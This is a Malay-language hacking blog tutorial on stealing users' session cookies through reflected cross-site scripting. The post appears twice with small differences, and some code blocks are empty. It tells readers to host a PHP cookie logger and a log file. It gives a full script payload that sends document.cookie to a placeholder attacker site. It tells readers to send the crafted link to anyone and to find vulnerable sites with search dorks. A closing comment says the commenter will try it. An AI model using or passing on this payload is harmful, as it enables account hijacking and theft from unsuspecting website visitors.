Assalamualaikum dan salam Sejahtera
tutorial ini adalah cara untuk mencuri biskut, atau mengambil biskut dari user yang klik pada website yang vulnerable kepada xss attack . XSS juga dikenali sebagai Cross site scripting . yang terdapat pada "web Application".Jika korang ingin menbaca dengan lebih lanjut , korang boleh rujuk pada link di bawah :
http://en.wikipedia.org/wiki/Cross-site_scripting
mari kita mulakan dengan tutorial untuk mencuri biskut .
Pertama anda perlu sediakan dua file :
upload kedua-dua file tersebut kedalam webhosting .
ok . kita perlu dapatkan target . jika korang sudah dapatkan target ,korang boleh masukan code ini , untuk mengetahui sama ada target boleh di exploit atau tidak .
Code :
dan save as.php .
script di atas akan merekod cookies user yang view link xss itu tadi .
Sebagai contoh , target kita adalah "http://google.com".
Jadi link yang vulnerable kepada xss adalah http://google.com/search_q=xss
Jadi yang korang perlu lakukan adalah :
Http://google.com/search_q="><script language= "JavaScript">document.location="http://yoursite.com/apasaja.php?cookie=" + document.cookie;document.location="http://google.com/"</script>
untuk mendapatkan cookies . Sila serahkan link xss korang kepada sesiapa sahaja seperti di atas ,
Sila buka log file korang , yang korang sertakan dengan apasahaja tadi ,
dan hasilnya korang akan dapat seperti dibawah :
Sila fahami konsep di atas , dan ambil exploit yang telah diberikan .
Jika korang nak tahu google dork mengenai Xss korang boleh rujuk link dibawah :
http://h4ckingtutors.blogspot.com/2012/07/hacking-xss-dork-repost.html
Itu sahaja . Enjoy
Incoming search :
Apakah Itu Xss
xss cookies stealing
tutorial ini adalah cara untuk mencuri biskut, atau mengambil biskut dari user yang klik pada website yang vulnerable kepada xss attack . XSS juga dikenali sebagai Cross site scripting . yang terdapat pada "web Application".Jika korang ingin menbaca dengan lebih lanjut , korang boleh rujuk pada link di bawah :
http://en.wikipedia.org/wiki/Cross-site_scripting
mari kita mulakan dengan tutorial untuk mencuri biskut .
Pertama anda perlu sediakan dua file :
- apasahaja.php
- log.txt
upload kedua-dua file tersebut kedalam webhosting .
ok . kita perlu dapatkan target . jika korang sudah dapatkan target ,korang boleh masukan code ini , untuk mengetahui sama ada target boleh di exploit atau tidak .
Code :
Ok. Mari belajar cara untuk Cuir biskut mengunakan Xss .
Pertama sekali korang masukan php code ini di dalam "apasaja.php"
dan save as.php .
script di atas akan merekod cookies user yang view link xss itu tadi .
Sebagai contoh , target kita adalah "http://google.com".
Jadi link yang vulnerable kepada xss adalah http://google.com/search_q=xss
Jadi yang korang perlu lakukan adalah :
Http://google.com/search_q="><script language= "JavaScript">document.location="http://yoursite.com/apasaja.php?cookie=" + document.cookie;document.location="http://google.com/"</script>
untuk mendapatkan cookies . Sila serahkan link xss korang kepada sesiapa sahaja seperti di atas ,
Sila buka log file korang , yang korang sertakan dengan apasahaja tadi ,
dan hasilnya korang akan dapat seperti dibawah :
Sila fahami konsep di atas , dan ambil exploit yang telah diberikan .
Jika korang nak tahu google dork mengenai Xss korang boleh rujuk link dibawah :
http://h4ckingtutors.blogspot.com/2012/07/hacking-xss-dork-repost.html
Itu sahaja . Enjoy
Incoming search :
Apakah Itu Xss
xss cookies stealing
Hmm, boleh juga :) izin mencoba :) terima kasih
BalasHapus